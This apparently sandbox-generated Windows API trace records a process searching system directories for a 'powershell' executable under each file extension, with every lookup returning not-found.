	[0603.326] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.326] SetErrorMode (uMode=0x1) returned 0x1
	[0603.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.327] SetErrorMode (uMode=0x1) returned 0x1
	[0603.327] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.327] SetErrorMode (uMode=0x1) returned 0x1
	[0603.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.327] SetErrorMode (uMode=0x1) returned 0x1
	[0603.328] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.328] SetErrorMode (uMode=0x1) returned 0x1
	[0603.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.328] SetErrorMode (uMode=0x1) returned 0x1
	[0603.328] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.329] SetErrorMode (uMode=0x1) returned 0x1
	[0603.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.329] SetErrorMode (uMode=0x1) returned 0x1
	[0603.329] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.329] SetErrorMode (uMode=0x1) returned 0x1
	[0603.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.330] SetErrorMode (uMode=0x1) returned 0x1
	[0603.330] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.330] SetErrorMode (uMode=0x1) returned 0x1
	[0603.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.330] SetErrorMode (uMode=0x1) returned 0x1
	[0603.330] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.331] SetErrorMode (uMode=0x1) returned 0x1
	[0603.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.331] SetErrorMode (uMode=0x1) returned 0x1
	[0603.331] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.331] SetErrorMode (uMode=0x1) returned 0x1
	[0603.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.332] SetErrorMode (uMode=0x1) returned 0x1
	[0603.332] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.332] SetErrorMode (uMode=0x1) returned 0x1
	[0603.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.332] SetErrorMode (uMode=0x1) returned 0x1
	[0603.333] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.333] SetErrorMode (uMode=0x1) returned 0x1
	[0604.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.573] SetErrorMode (uMode=0x1) returned 0x1
	[0604.573] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.574] SetErrorMode (uMode=0x1) returned 0x1
	[0604.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.574] SetErrorMode (uMode=0x1) returned 0x1
	[0604.574] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.574] SetErrorMode (uMode=0x1) returned 0x1
	[0604.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.575] SetErrorMode (uMode=0x1) returned 0x1
	[0604.575] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.575] SetErrorMode (uMode=0x1) returned 0x1
	[0604.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.576] SetErrorMode (uMode=0x1) returned 0x1
	[0604.576] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.576] SetErrorMode (uMode=0x1) returned 0x1
	[0604.576] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.576] SetErrorMode (uMode=0x1) returned 0x1
	[0604.576] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.577] SetErrorMode (uMode=0x1) returned 0x1
	[0604.577] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.577] SetErrorMode (uMode=0x1) returned 0x1
	[0604.577] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.577] SetErrorMode (uMode=0x1) returned 0x1
	[0604.577] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.578] SetErrorMode (uMode=0x1) returned 0x1
	[0604.578] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.578] SetErrorMode (uMode=0x1) returned 0x1
	[0604.578] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.578] SetErrorMode (uMode=0x1) returned 0x1
	[0604.578] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.579] SetErrorMode (uMode=0x1) returned 0x1
	[0604.579] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.579] SetErrorMode (uMode=0x1) returned 0x1
	[0604.579] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.579] SetErrorMode (uMode=0x1) returned 0x1
	[0604.581] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.581] SetErrorMode (uMode=0x1) returned 0x1
	[0604.581] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.582] SetErrorMode (uMode=0x1) returned 0x1
	[0604.582] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.582] SetErrorMode (uMode=0x1) returned 0x1
	[0604.582] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.582] SetErrorMode (uMode=0x1) returned 0x1
	[0604.583] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.583] SetErrorMode (uMode=0x1) returned 0x1
	[0604.583] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.583] SetErrorMode (uMode=0x1) returned 0x1
	[0604.583] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.583] SetErrorMode (uMode=0x1) returned 0x1
	[0604.584] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.584] SetErrorMode (uMode=0x1) returned 0x1
	[0604.584] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.584] SetErrorMode (uMode=0x1) returned 0x1
	[0604.584] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.585] SetErrorMode (uMode=0x1) returned 0x1
	[0604.585] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.585] SetErrorMode (uMode=0x1) returned 0x1
	[0604.585] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.585] SetErrorMode (uMode=0x1) returned 0x1
	[0604.585] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.586] SetErrorMode (uMode=0x1) returned 0x1
	[0604.586] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.586] SetErrorMode (uMode=0x1) returned 0x1
	[0604.586] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.586] SetErrorMode (uMode=0x1) returned 0x1
	[0604.586] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.587] SetErrorMode (uMode=0x1) returned 0x1
	[0604.587] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.587] SetErrorMode (uMode=0x1) returned 0x1
	[0604.587] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.587] SetErrorMode (uMode=0x1) returned 0x1
	[0604.588] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.588] SetErrorMode (uMode=0x1) returned 0x1
	[0604.588] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.588] SetErrorMode (uMode=0x1) returned 0x1
	[0604.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.588] SetErrorMode (uMode=0x1) returned 0x1
	[0604.589] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.589] SetErrorMode (uMode=0x1) returned 0x1
	[0604.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.589] SetErrorMode (uMode=0x1) returned 0x1
	[0604.589] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.589] SetErrorMode (uMode=0x1) returned 0x1
	[0604.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.590] SetErrorMode (uMode=0x1) returned 0x1
